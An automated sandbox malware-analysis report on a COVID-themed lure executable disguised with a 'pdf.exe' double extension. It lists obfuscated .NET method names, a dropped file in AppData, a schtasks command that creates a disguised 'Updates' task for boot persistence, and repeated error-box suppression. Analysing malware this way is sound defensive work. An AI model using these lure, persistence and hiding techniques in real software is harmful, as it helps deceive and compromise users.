                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: qvDFOnW.exe.0.dr, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: qvDFOnW.exe.0.dr, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: qvDFOnW.exe.0.dr, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: qvDFOnW.exe.0.dr, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: qvDFOnW.exe.0.dr, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Roaming\qvDFOnW.exeJump to dropped file

                Boot Survival:

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                Source: Possible double extension: pdf.exeStatic PE information: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
